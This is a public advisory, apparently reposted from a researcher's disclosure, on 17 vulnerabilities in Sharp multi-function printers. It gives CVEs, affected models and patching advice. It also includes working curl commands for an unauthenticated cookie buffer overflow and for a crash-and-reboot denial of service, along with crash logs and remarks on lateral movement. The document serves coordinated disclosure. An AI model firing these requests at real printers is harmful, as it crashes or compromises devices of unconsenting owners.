Share
## https://sploitus.com/exploit?id=PACKETSTORM:179363
Hello,  
  
Please find a text-only version below sent to security mailing lists.  
  
The complete version on "17 vulnerabilities in Sharp Multi-Function  
Printers" is posted here:  
https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html  
  
The text version is also posted here:  
https://pierrekim.github.io/advisories/2024-sharp-mfp.txt  
  
  
=== text-version of the advisory ===  
  
-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512  
  
## Advisory Information  
  
Title: 17 vulnerabilities in Sharp Multi-Function Printers  
Advisory URL: https://pierrekim.github.io/advisories/2024-sharp-mfp.txt  
Blog URL: https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html  
Date published: 2024-06-27  
Vendors contacted: JPCERT  
Release mode: Released  
CVE: CVE-2024-28038, CVE-2024-36251, CVE-2024-28955, CVE-2024-29146,  
CVE-2024-29978, CVE-2024-32151, CVE-2024-33605, CVE-2024-33610,  
CVE-2024-33610, CVE-2024-35244, CVE-2024-33616, CVE-2024-34162,  
CVE-2024-36248  
  
  
  
## Product description  
  
> Multifunction printers offer more than just print. These devices integrate the power of a printer, photocopier and scanner into one single device.  
>  
> From https://www.sharp.co.uk/printers-photocopiers/explore-sharp-printers/sharp-multifunction-printers  
  
  
  
## Vulnerability Summary  
  
Vulnerable versions: 308 different models of Sharp Multi-Function  
Printers (MFP) are vulnerable. It is recommended to visit the official  
Sharp advisory (https://global.sharp/products/copier/info/info_security_2024-05.html)  
and apply security patches and replace unsupported Multi-Function  
Printers (MFP) models.  
  
The summary of the vulnerabilities is as follows:  
  
1. CVE-2024-28038 - Memory corruption in the main program - Remote  
Code Execution against the web server without authentication  
2. CVE-2024-36251 - Invalid (0x000000d0) pointer dereference - Remote  
DoS without authentication  
3. CVE-2024-28955, CVE-2024-29146, CVE-2024-29978, CVE-2024-32151 -  
World-readable coredump files and insecure storage of credentials  
4. CVE-2024-33605 - Arbitrary Directory Listing without authentication  
5. non-assigned CVE vulnerability - Local File Inclusion allowing to  
read any file (e.g. Coredump files) without authentication  
5.1 Generation of the coredump file on the printer  
5.2 Local File Inclusion of the coredump file  
5.3 Retrieve of credentials using the coredump files  
5.4 Retrieve of credentials using configuration files  
6. CVE-2024-33610 - Backdoor webpage - Listing of session cookies  
without authentication  
7. non-assigned CVE vulnerability - Configuration webpages reachable  
without authentication  
8. CVE-2024-33610 - Reboot without authentication - Remote DoS  
9. CVE-2024-35244 - Backdoor access - Service  
10. non-assigned CVE vulnerability - Backdoor access - FSS User  
11. non-assigned CVE vulnerability - Insecure default credentials  
12. CVE-2024-33616 - Read admin access on telnet  
13. non-assigned CVE vulnerability - XSS on all the Sharp printers (login.html)  
14. non-assigned CVE vulnerability - XSS on all the Sharp printers  
(all other HTML pages)  
15. CVE-2024-34162 - Exfiltration of LDAP credentials by downgrading  
the security  
16. CVE-2024-36248 - Hardcoded Google API Keys  
17. non-assigned CVE vulnerability - Hardcoded Amazon API Keys  
18. N-day CVE-2022-45796 - Remote Code Execution  
  
TL;DR: An attacker can compromise Sharp Multi-Function Printers using  
multiple vulnerabilities.  
  
List of vulnerable models of Sharp Multi-Function Printers (308 models):  
  
BP-30C25, BP-30C25T, BP-30C25Y, BP-30C25Z, BP-30M35, BP-30M31,  
BP-30M28, BP-30M35T, BP-30M31T, BP-30M28T,  
BP-50C36, BP-50C31, BP-50C26, BP-50C65, BP-50C55, BP-50C45,  
BP-50M36, BP-50M31, BP-50M26, BP-50M55,  
BP-50M50, BP-50M45, BP-55C26, BP-60C45, BP-60C36, BP-60C31,  
BP-70C36, BP-70C31, BP-70C65, BP-70C55,  
BP-70C45, BP-70M36, BP-70M31, BP-70M65, BP-70M55, BP-70M45,  
BP-90C70, BP-90C80, BP-B547WD, BP-B537WR,  
BP-B550WD, BP-B540WR, BP-70M90, BP-70M75, MX-M1205, MX-M1055,  
DX-2500N, DX-2000U, MX-2010U, MX-1810U,  
MX-2314N, MX-2314NR, MX-2630N, MX-3050N A, MX-3050V A, MX-3100N,  
MX-3100G, MX-2600N, MX-2600G, MX-3101N,  
MX-2601N, MX-2301N, MX-3111U, MX-2310U, MX-2310R, MX-3115N,  
MX-2615N, MX-2615 A, MX-3116N, MX-2616N,  
MX-3551, MX-3051, MX-2651, MX-3570N, MX-3070N, MX-3570V, MX-3070V,  
MX-3571, MX-3071, MX-3571S,  
MX-3071S, MX-3610N, MX-3110N, MX-2610N, MX-3110N A, MX-3610NR,  
MX-3640N, MX-3140N, MX-2640N, MX-3140N A,  
MX-3640NR, MX-3140NR, MX-2640NR, MX-4050N, MX-3550N, MX-3050N,  
MX-4050V, MX-3550V, MX-3050V, MX-4060N,  
MX-3560N, MX-3060N, MX-4060V, MX-3560V, MX-3060V, MX-4061,  
MX-3561, MX-3061, MX-4061S, MX-3561S,  
MX-3061S, MX-5001N, MX-5000N, MX-4101N, MX-4100N, MX-5112N,  
MX-5111N, MX-5110N, MX-4112N, MX-4111N,  
MX-4110N, MX-5141N A, MX-4140N A, MX-5141N, MX-5140N, MX-4141N,  
MX-4140N, MX-6050N, MX-5050N, MX-6050V,  
MX-5050V, MX-6051, MX-5051, MX-4051, MX-6070N A, MX-4070N A,  
MX-3070N A, MX-6070N, MX-5070N, MX-4070N,  
MX-6070V A, MX-4070V A, MX-3070V A, MX-6070V, MX-5070V, MX-4070V,  
MX-6071, MX-5071, MX-4071, MX-6071S,  
MX-5071S, MX-4071S, MX-7040N, MX-6240N, MX-7500N, MX-6500N,  
MX-7580N, MX-6580N, MX-8081, MX-7081,  
MX-8090N, MX-7090N, MX-B400P, MX-B380P, MX-B401, MX-B381, MX-B402,  
MX-B382, MX-B402P, MX-B382P,  
MX-B402SC, MX-B382SC, MX-B455W, MX-B355W, MX-B455WT, MX-B355WT,  
MX-B455WZ, MX-B355WZ, MX-B456WH, MX-B356WH,  
MX-B456W, MX-B356W, MX-B476WH, MX-B376WH, MX-B476W, MX-B376W,  
MX-C301W, MX-C301, MX-C304, MX-C303,  
MX-C304WH, MX-C303WH, MX-C304W, MX-C303W, MX-C312, MX-C311,  
DX-C311, DX-C311J, MX-C310, DX-C310,  
MX-C381, DX-C381, MX-C380, MX-C381B, MX-C400P, MX-C380P, MX-C401,  
DX-C401, DX-C401 J, MX-C400,  
DX-C400, MX-C402SC, MX-C382SC, MX-C382SCB, MX-M1204, MX-M1054,  
MX-M904, MX-M1206, MX-M1056, MX-M2630,  
MX-M2630 A, MX-M266N, MX-M265N, MX-M265U, MX-M266NV, MX-M265NV,  
MX-M265UV, MX-M3050 A, MX-M314NV, MX-M264NV,  
MX-M315NE, MX-M265NE, MX-M315NE, MX-M265NE, MX-M315V, MX-M265V,  
MX-M354N, MX-M314N, MX-M264N, MX-M354NR,  
MX-M314NR, MX-M264NR, MX-M354U, MX-M314U, MX-M264U, MX-M3550,  
MX-M3050, MX-M3551, MX-M3051, MX-M2651,  
MX-M356N, MX-M316N, MX-M315N, MX-M356U, MX-M315U, MX-M356NV,  
MX-M316NV, MX-M315NV, MX-M356UV, MX-M315UV,  
MX-M3570, MX-M3070, MX-M3571, MX-M3071, MX-M3571S, MX-M3071S,  
MX-M465N A, MX-M365N A, MX-M503N, MX-M453N,  
MX-M363N, MX-M283N, MX-M503U, MX-M453U, MX-M363U, MX-M564N,  
MX-M464N, MX-M364N, MX-M564N A, MX-M565N,  
MX-M465N, MX-M365N, MX-M6050, MX-M5050, MX-M4050, MX-M6051,  
MX-M5051, MX-M4051, MX-M6070 A, MX-M4070 A,  
MX-M3070 A, MX-M6070, MX-M5070, MX-M4070, MX-M6071, MX-M5071,  
MX-M4071, MX-M6071S, MX-M5071S, MX-M4071S,  
MX-M753N, MX-M753U, MX-M623N, MX-M623U, MX-M754N, MX-M654N,  
MX-M754N A, MX-M654N A, MX-M7570, MX-M6570,  
MX-M905.  
  
_Miscellaneous notes_:  
  
This security assessment was entirely done using a blackbox approach  
and fully-remote - I only had some IPs of printers (no physical access  
and no credentials for admin or normal users). Consequently, the  
physical security of the printers was not analyzed and the  
vulnerabilities were confirmed with about 15 different models running  
the latest firmware versions (MX-3060N, MX-3061, MX-3070N, MX-3560N,  
MX-3561, MX-5070V, MX-5071, MX-C3051R MX-C3081R, MX-M365N, MX-M453U,  
MX-M465N, MX-M5050, MX-M5051, MX-M6051 and MX-M6071).  
  
The vulnerabilities were communicated to JPCERT on June 1, 2023 and  
communications with JPCERT were very effective - they fully managed  
interactions with Sharp.  
  
_Impacts_  
  
An attacker can compromise Sharp multi-function printers (MFP) and  
execute code. These printers are running Linux and are powerful. They  
are ideal to host implants (and fun programs, like Bettercap) and move  
laterally inside infrastructures.  
  
_Recommendations_  
  
- - Use network segmentation to isolate MFPs.  
- - Apply security patches.  
- - Replace unsupported MFPs.  
  
  
  
## Details - Memory corruption in the main program - Remote Code  
Execution against the web server without authentication  
  
By Default, Sharp printers are using a single super-program that will  
run as root and provide network daemons (ftp, http, snmp,  
raw-printer-9100, ...). This single program is vulnerable to a  
stack-based buffer overflow without authentication.  
  
This `main` program runs as root and its HTTP stack is vulnerable,  
without authentication, to a stack-based buffer overflow, allowing an  
attacker to redirect the control flow of the program and achieve  
remote code execution.  
  
`main` program listening on port 80/tcp:  
  
sh-4.3# ps -auxww | grep main  
root 1186 6.3 5.3 2124656 172688 ? Sl 00:27 43:36  
/tmp/app/ui/ui_mainview -hidecursor  
root 2081 3.9 10.9 2515532 348980 ? Sl 00:27 26:52  
/tmp/main/main -cpu=1 -stack=8000 -fifo -nosigmask -nodlychk  
root 13598 0.0 0.0 1980 368 pts/0 S+ 11:49 0:00 grep main  
sh-4.3# netstat -laputen | grep main  
tcp 0 0 0.0.0.0:50001 0.0.0.0:* LISTEN  
0 10217 2081/main  
tcp6 0 0 :::443 :::* LISTEN  
0 12538 2081/main  
tcp6 0 0 :::52000 :::* LISTEN  
0 33214 2081/main  
tcp6 0 0 :::10080 :::* LISTEN  
0 18542 2081/main  
tcp6 0 0 :::515 :::* LISTEN  
0 10166 2081/main  
tcp6 0 0 :::53000 :::* LISTEN  
0 12539 2081/main  
tcp6 0 0 :::10443 :::* LISTEN  
0 18545 2081/main  
tcp6 0 0 :::5900 :::* LISTEN  
0 33233 2081/main  
tcp6 0 0 :::9100 :::* LISTEN  
0 12534 2081/main  
tcp6 0 0 :::80 :::* LISTEN  
0 12537 2081/main  
tcp6 0 0 :::21 :::* LISTEN  
0 10164 2081/main  
tcp6 0 0 :::631 :::* LISTEN  
0 10168 2081/main  
udp 0 0 127.0.0.1:9473 0.0.0.0:*  
0 13202 2081/main  
udp6 0 0 :::5353 :::*  
0 12497 2081/main  
udp6 0 0 :::161 :::*  
0 33229 2081/main  
udp6 0 0 :::546 :::*  
0 33145 2081/main  
sh-4.3#  
  
By default, the printer will provide a MFPSESSIONID cookie when  
reaching the printer with a browser as shown below. This cookie will  
then be used for authentication purposes if the user decides to log  
into the printer. For example, with a HTTP request to /main.html:  
  
kali% curl -kv http://10.0.0.1/main.html | head  
% Total % Received % Xferd Average Speed Time Time  
Time Current  
Dload Upload Total Spent  
Left Speed  
0 0 0 0 0 0 0 0 --:--:-- --:--:--  
--:--:-- 0* Trying 10.0.0.1:80...  
* Connected to 10.0.0.1 (10.0.0.1) port 80 (#0)  
> GET /main.html HTTP/1.1  
> Host: 10.0.0.1  
> User-Agent: curl/7.88.1  
> Accept: */*  
>  
< HTTP/1.1 200 OK  
< Server: Rapid Logic/1.1  
< MIME-version: 1.0  
< Date: Thu Jan 1 02:32:35 1970 GMT  
< Content-Type: text/html; charset=UTF-8  
< Transfer-Encoding: chunked  
< Connection: close  
< Pragma: no-cache  
< Cache-Control: no-cache  
< X-Frame-Options: DENY  
< Set-Cookie:  
MFPSESSIONID=020015D2C59E7B68C9FB5F411B0E59FCBEF70F7E03CEE4C4C5A12023051115051847BC555A  
< Extend-sharp-setting-status: 0  
<  
{ [2 bytes data]  
<!DOCTYPE html>  
<html lang="en">  
<head>  
<meta charset="UTF-8" />  
<meta name="viewport" content="width=320,initial-scale=1.0" />  
<meta name="format-detection" content="telephone=no" />  
<meta http-equiv="X-UA-Compatible" content="IE=8; IE=10; IE=11" />  
<title>Machine Identification - MX-M6071</title>  
<link rel="stylesheet" href="other.css" type="text/css" />  
<link rel="stylesheet" href="color1.css" type="text/css" />  
* Failure writing output to destination  
* Failed reading the chunked-encoded stream  
100 6950 0 6950 0 0 196k 0 --:--:-- --:--:--  
--:--:-- 199k  
* Closing connection 0  
curl: (23) Failure writing output to destination  
kali%  
  
By sending a malicious HTTP request with a long MFPSESSIONID cookie,  
it is possible to overwrite the stack of the main program.  
  
This payload will send a MFPSESSIONID cookie with a payload of 643  
bytes. This payload will overwrite a stack buffer inside the main  
program. The buffer is probably 639 bytes and `EDBB` will overwrite  
the stack:  
  
kali% var=`perl -e "print 'A'x639"`; curl -v -b  
"MFPSESSIONID=${var}EDCB" http://10.0.0.1/system.html  
* Trying 10.0.0.1:80...  
* Connected to 10.0.0.1 (10.0.0.1) port 80 (#0)  
> GET /system.html HTTP/1.1  
> Host: 10.0.0.1  
> User-Agent: curl/7.88.1  
> Accept: */*  
> Cookie: MFPSESSIONID=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEDCB  
>  
  
If /system.html does not exist, it is possible to use /main.html or  
any existing html webpage instead:  
  
kali% var=`perl -e "print 'A'x639"`; curl -v -b  
"MFPSESSIONID=${var}EDCB" http://10.0.0.1/main.html  
* Trying 10.0.0.1:80...  
* Connected to 10.0.0.1 (10.0.0.1) port 80 (#0)  
> GET /system.html HTTP/1.1  
> Host: 10.0.0.1  
> User-Agent: curl/7.88.1  
> Accept: */*  
> Cookie: MFPSESSIONID=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEDCB  
>  
  
If the first exploitation does not work, it is possible to resend it  
again to overwrite the stack the second time:  
  
kali% var=`perl -e "print 'A'x639"`; curl -v -b  
"MFPSESSIONID=${var}EDCB" http://10.0.0.1/system.html  
* Trying 10.0.0.1:80...  
* Connected to 10.0.0.1 (10.0.0.1) port 80 (#0)  
> GET /system.html HTTP/1.1  
> Host: 10.0.0.1  
> User-Agent: curl/7.88.1  
> Accept: */*  
> Cookie: MFPSESSIONID=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEDCB  
kali% var=`perl -e "print 'A'x639"`; curl -v -b  
"MFPSESSIONID=${var}EDCB" http://10.0.0.1/system.html  
* Trying 10.0.0.1:80...  
* Connected to 10.0.0.1 (10.0.0.1) port 80 (#0)  
> GET /system.html HTTP/1.1  
> Host: 10.0.0.1  
> User-Agent: curl/7.88.1  
> Accept: */*  
> Cookie: MFPSESSIONID=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEDCB  
  
The `dmesg` output on the printer will confirm that the main program  
crashed while trying to reach the address 0x42434445, corresponding to  
the previous `EDCB` sent inside the cookie. `EDCB` is represented in  
the little-endian format as ARM is little-endian and 0x42434445 can be  
found inside several registers (but not PC).  
  
output of `dmesg`:  
  
[ 127.970220] main[15612]: unhandled level 2 translation fault  
(11) at 0x42434445, esr 0x92000006  
[ 127.979463] pgd = ffff80007a07e000  
[ 127.982981] [42434445] *pgd=00000000fa099003,  
*pud=00000008c6f9d003, *pmd=0000000000000000  
  
[ 127.992811] CPU: 1 PID: 15612 Comm: main Tainted: P O  
4.1.46-rt52 #2  
[ 128.000296] Hardware name: LS1043A MFP Board (DT)  
[ 128.005195] task: ffff8008372c69c0 ti: ffff80083dde0000  
task.ti: ffff80083dde0000  
[ 128.012710] PC is at 0x20d4ff8  
[ 128.015761] LR is at 0x2a0  
[ 128.018465] pc : [<00000000020d4ff8>] lr : [<00000000000002a0>]  
pstate: 900f0010  
[ 128.026024] sp : 000000008f12f7c0  
[ 128.029335] x12: 0000000042434445  
[ 128.032981] x11: 000000008fd45008 x10: 0000000000000001  
[ 128.038298] x9 : 0000000091247bf8 x8 : 000000008fd5648c  
[ 128.043678] x7 : 0000000000000000 x6 : 000000008fd56c58  
[ 128.048996] x5 : 000000008fd569bc x4 : 0000000008b90bdc  
[ 128.054388] x3 : 0000000042434445 x2 : 0000000042434445  
[ 128.059834] x1 : 000000008fd569b8 x0 : 0000000000000001  
  
On the printer, using GDB, we will confirm the main program crashed  
and the stack has been successfully corrupted:  
  
sh-4.3# ps -auxww|grep main  
root 1186 9.7 4.9 2123632 158080 ? Sl 11:31 0:21  
/tmp/app/ui/ui_mainview -hidecursor  
root 2023 7.8 9.8 2505880 316360 ? Sl 11:31 0:15  
/tmp/main/main -cpu=1 -stack=8000 -fifo -nosigmask -nodlychk  
root 26544 0.0 0.0 1980 376 pts/0 S+ 11:34 0:00 grep main  
sh-4.3# gdb -p 2023  
GNU gdb (GDB) 7.10.1.20160210-cvs  
warning: File "/lib/libthread_db-1.0.so" auto-loading has been  
declined by your `auto-load safe-path' set to  
"$debugdir:$datadir/auto-load".  
  
warning: Unable to find libthread_db matching inferior's thread  
library, thread debugging will not be available.  
0xf744f1c4 in pthread_join () from /lib/libpthread.so.0  
(gdb) c  
  
...  
[LWP 32749 exited]  
[New LWP 32750]  
[New LWP 32751]  
[LWP 32751 exited]  
[New LWP 32752]  
...  
[New LWP 27196]  
[LWP 27196 exited]  
[New LWP 27197]  
  
Program received signal SIGSEGV, Segmentation fault.  
[Switching to LWP 27195]  
0x020d4ff8 in ?? ()  
(gdb) bt  
#0 0x020d4ff8 in ?? ()  
#1 0x000002a0 in ?? ()  
Backtrace stopped: previous frame identical to this frame (corrupt stack?)  
(gdb) info reg  
r0 0x1 1  
r1 0x903e0ec8 2419986120  
r2 0x42434445 1111704645  
r3 0x42434445 1111704645  
r4 0x8b90bdc 146344924  
r5 0x903e0ecc 2419986124  
r6 0x903e1168 2419986792  
r7 0x0 0  
r8 0x903e082c 2419984428  
r9 0x918ddcb8 2441993400  
r10 0x1 1  
r11 0x903db008 2419961864  
r12 0x42434445 1111704645  
sp 0x72231fc0 0x72231fc0  
lr 0x2a0 672  
pc 0x20d4ff8 0x20d4ff8  
cpsr 0x90050010 -1878720496  
(gdb) info frame  
Stack level 0, frame at 0x72231fc0:  
pc = 0x20d4ff8; saved pc = 0x2a0  
called by frame at 0x72231fc0  
Arglist at 0x72231fc0, args:  
Locals at 0x72231fc0, Previous frame's sp is 0x72231fc0  
(gdb)  
  
There is no ASLR in the `main` program; the addresses are always  
identical therefore exploitation is very likely.  
  
Exploitation was not attempted since no enough time was allocated to  
develop such exploit during this security assessment and I already had  
a remote shell as root on the printers. Sharp confirmed that  
exploitation is possible.  
  
An attacker with a RCE vulnerability can then move laterally and use  
Wifi to exfiltrate information:  
  
bash-4.3# iwlist ath0 scan  
ath0 Scan completed :  
Cell 01 - Address: 00:3C:10:01:02:03  
ESSID:"[REDACTED]"  
Mode:Master  
Frequency:2.412 GHz (Channel 1)  
Quality=93/94 Signal level=-54 dBm Noise level=-95 dBm  
Encryption key:off  
Bit Rates:12 Mb/s; 18 Mb/s; 24 Mb/s; 36 Mb/s; 48 Mb/s  
54 Mb/s  
Extra:bcn_int=100  
  
bash-4.3#  
  
  
  
## Details - Invalid (0x000000d0) pointer dereference - Remote DoS  
without authentication  
  
It was observed that the `/billcodedef_sub_sel.html` webpage is  
reachable without authentication on Sharp printers. A specific request  
to this webpage will trigger an invalid pointer deference in the main  
program. The printer will then reboot after creating coredump files.  
  
[please use the HTML version at  
https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]  
  
[please use the HTML version at  
https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]  
  
When submitting the request with the Sub Code `test` by pressing  
`Search Start(Q)`, the HTTP request will be:  
  
HTTP request using the HTML form from `billcodedef_sub_sel.html`:  
  
[please use the HTML version at  
https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]  
  
[please use the HTML version at  
https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]  
  
It is possible to modify the HTTP request to change  
`curr_page_url=%2Fbillcodedef_sub_sel.html` to  
`curr_page_url=%2Fbillcodedef_sub_sel.html?`. A question mark was  
added after `billcodedef_sub_sel.html`.  
  
The resulting request will be:  
  
[please use the HTML version at  
https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]  
  
[please use the HTML version at  
https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]  
  
The corresponding malicious HTTP request to trigger the DoS is:  
  
POST /billcodedef_sub_sel.html? HTTP/1.1  
Host: 10.0.0.1  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0)  
Gecko/20100101 Firefox/102.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 406  
Origin: http://10.0.0.1  
Connection: close  
Referer: http://10.0.0.1/billcodedef_sub_sel.html?  
Cookie: MFPSESSIONID=020035B15A47378CF80C6175263F714EEF9118E72A1AA6C9CAC6202305181146331E5FF54;  
sideBarflag=1  
Upgrade-Insecure-Requests: 1  
  
billing_code_def_selWebchg=&action=searchbtn&ordinate=0&token2=AEC039F52DC886D169AC7F977F61D4C61295539BC0A3572B08E37FB291B9A766E238FB699426F67B&ggt_textbox%288%29=test&ggt_textbox%2811%29=&ggt_select%2829%29=1&billing_radio=2%2C&BillingCode%282%2C%29=Not+Set&BillingCodeName%28%29=&ggt_hidden%2839%29=0&ggt_hidden%2840%29=1&ggt_hidden%2844%29=&curr_page_url=%2Fbillcodedef_sub_sel.html?&selBillingCodeName=  
  
We can also reproduce the issue using curl:  
  
kali% curl -i -s -k -X $'POST' -H $'Host: 10.0.0.1' --data-binary  
'curr_page_url=%2Fbillcodedef_sub_sel.html?'  
'http://10.0.0.1/billcodedef_sub_sel.html'  
  
On the printer, we can see a crash:  
  
[ 9914.440518] main[18602]: unhandled level 3 translation fault  
(11) at 0x000000d0, esr 0x92000007  
[ 9914.453538] pgd = ffff80082f408000  
[ 9914.456936] [000000d0] *pgd=00000000f9ea6003,  
*pud=00000000f9f6e003, *pmd=00000000f9c0f003, *pte=0000000000000000  
  
[ 9914.468751] CPU: 1 PID: 18602 Comm: main Tainted: P O  
4.1.46-rt52 #2  
[ 9914.476433] Hardware name: LS1043A MFP Board (DT)  
[ 9914.481138] task: ffff80083de6c680 ti: ffff80082cb20000  
task.ti: ffff80082cb20000  
[ 9914.488691] PC is at 0x228fe6c  
[ 9914.491744] LR is at 0x228f820  
[ 9914.494830] pc : [<000000000228fe6c>] lr : [<000000000228f820>]  
pstate: 600f0010  
[ 9914.502227] sp : 000000007212fd70  
[ 9914.505539] x12: 00000000ffffffff  
[ 9914.508939] x11: 000000007212fdb0 x10: 0000000000000001  
[ 9914.514367] x9 : 0000000091170990 x8 : 0000000000000002  
[ 9914.519683] x7 : 000000007212fd88 x6 : 0000000091172799  
[ 9914.525102] x5 : 0000000000000000 x4 : 0000000000000000  
[ 9914.530417] x3 : 0000000000000000 x2 : 000000007212fdd0  
[ 9914.535764] x1 : 0000000000000061 x0 : 0000000000000000  
  
[ 9914.543566] [BSPIF]bspif_pof_wait:signal receive(-512)  
[ 9914.548702] [BSPIF]bspif_pof_wait:  
[ 9988.116784] Panic : Oops Exit !!! [comm:irq/20-serial] [user_mode:0]  
  
With the creation of the corresponding coredump files:  
  
sh-4.3# cd /mnt/log && ls -latr  
[...]  
-rw-r--r-- 1 root root 19133981 May 18 11:48 core-main.log.gz.001  
-rw-r--r-- 1 root root 0 May 18 11:48 ERR_IFS.log  
-rw-r--r-- 1 root root 19133981 May 18 11:48 ERR_core-main.log.gz  
-rw-r--r-- 1 root root 97230 May 18 11:48 ERR_kern.log  
-rw-r--r-- 1 root root 0 May 18 11:48 ERR_core-pdl.log.gz  
-rw-r--r-- 1 root root 0 May 18 11:48 ERR_log_ui_mainview.log  
-rw-r--r-- 1 root root 21262 May 18 11:48 ERR_pdl.log  
-rw-r--r-- 1 root root 315 May 18 11:48 ERR_nf.log  
-rw-r--r-- 1 root root 314620 May 18 11:48 ERR_main.log  
-rw-r--r-- 1 root root 97363 May 18 11:48 kern.log.001  
-rw-r--r-- 1 root root 18653 May 18 11:48 vmstat.log.001  
-rw-r--r-- 1 root root 377 May 18 11:48 umount.log.001  
-rw-r--r-- 1 root root 1861 May 18 11:48 slinkerr1.log  
-rw-r--r-- 1 root root 4582 May 18 11:48 slinkerr0.log  
-rw-r--r-- 1 root root 45625 May 18 11:48 watch_idle.log  
-rw-r--r-- 1 root root 314692 May 18 11:49 main.log  
-rw-r--r-- 1 root root 132 May 18 11:49 bsp.log  
-rw-r--r-- 1 root root 96435 May 18 11:49 kern.log  
-rw-r--r-- 1 root root 407 May 18 11:49 vmstat.log  
sh-4.3# date  
